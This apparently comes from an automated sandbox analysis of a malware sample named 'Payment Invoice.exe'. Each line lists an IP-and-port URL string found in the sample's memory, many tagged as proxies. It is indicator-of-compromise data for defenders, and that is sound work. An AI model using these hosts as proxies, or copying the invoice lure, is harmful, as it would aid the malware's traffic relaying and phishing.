                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.255.113.232:85://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://44.226.167.102
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163197D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://44.226.167.102://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://44.226.167.102:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://44.226.167.102:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163197BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://44.226.167.102:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.10.42.20:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.10.42.20:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.16
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5034
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5034://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5038
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5038://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5039
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5039://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5040
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5040://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5212
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5212://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:52130q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319678000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5214
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631965D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5214://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5219
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5219://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:6010
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:6010://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:6012
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:6012://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.166:6005
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.166:6005://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.166:6008
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.166:6008://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.166:6014
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.166:6014://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.112.125.55:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.112.125.55:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.113.80.37:9050
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.113.80.37:9050://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319707000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163196D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.117.179.179:27836
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.117.179.179:27836://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.117.179.179:35942
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.117.179.179:35942://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.117.179.179:6522
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.117.179.179:6522://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.30.231
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.30.231://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.30.231:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.3
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.3://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.3:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.125.222.81:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.125.222.81:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.126.169.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.126.169.137:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.126.169.137:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316D96000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.134.80.222:3129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.134.80.222:3129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C2E000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.138.87.238:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.138.87.238:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.139.11.200
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.139.11.200://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.139.11.200:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.147.201.125:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.147.201.125:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.150.25.132:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.150.25.132:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.159.150.23:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.159.150.23:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.159.189.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.159.189.244:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.159.189.244:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.162.132.1:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.162.132.1:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.173.12.141:1994
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.173.12.141:1994://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.174.248.19:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.174.248.19:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.174.87.18:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.174.87.18:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.176.97.90:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.176.97.90:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.178.133.60:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.178.133.60:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.178.133.75:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.178.133.75:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.181.123.145:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.181.123.145:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.182.176.38:9947
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.182.176.38:9947://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.184.155.3:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.184.155.3:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.185.163.111:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.186.106.159:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.186.106.159:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.187.71.208:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.189.118.92:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.189.118.92:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.190.78.50:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.190.78.50:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.191.75.1
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.191.75.186:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.191.75.186:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.195.149.79:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.195.149.79:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.196.148.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.196.148.67:5432
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.196.148.67:5432://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.196.151.134:5432
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.196.151.134:5432://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.196.151.84:5432
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.196.151.84:5432://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.196.151.97:5432
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.196.151.97:5432://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.201.134.38:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.201.134.38:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.224.20.68:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.224.20.68:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.224.247.102
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.224.247.102://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.224.247.102:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.204.8:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.204.8:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.226.0.2:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.226.0.2:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.228.147.209:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.228.147.209:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.228.235.25:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.228.235.25:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.229.10.98:8402
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.229.10.98:8402://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B25000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.229.34.174:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.229.34.174:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.230.48.131:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.230.49.2:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.230.49.2:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.232.79.0:9292
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.232.79.0:9292://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.233.169.40:9994
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.233.169.40:9994://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.234.100.112:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631815E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.234.100.112:10802m
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.234.100.112:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.234.60.3:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.234.60.3:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.234.61.173:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.234.61.173:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.235.123.45:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.235.123.45:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.236.198.249:666
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.236.198.249:666://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.238.12.4:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.240.182.120:1975
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.240.182.120:1975://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.252.79.48:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.252.79.48:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.5.117.76:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.5.117.76:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.56.220.210:59920
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.56.220.210:59920://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.60.186.208:27488
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.60.186.208:27488://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.187.67:4009
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.187.67:4009://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.188.134:44499
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.188.134:44499://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.65.137.218:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.65.137.218:9990q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.65.137.218:999://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.65.138.48:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.65.138.48:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.65.65.18:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.65.65.18:4145%
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.65.65.18:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.7.24.102:3128
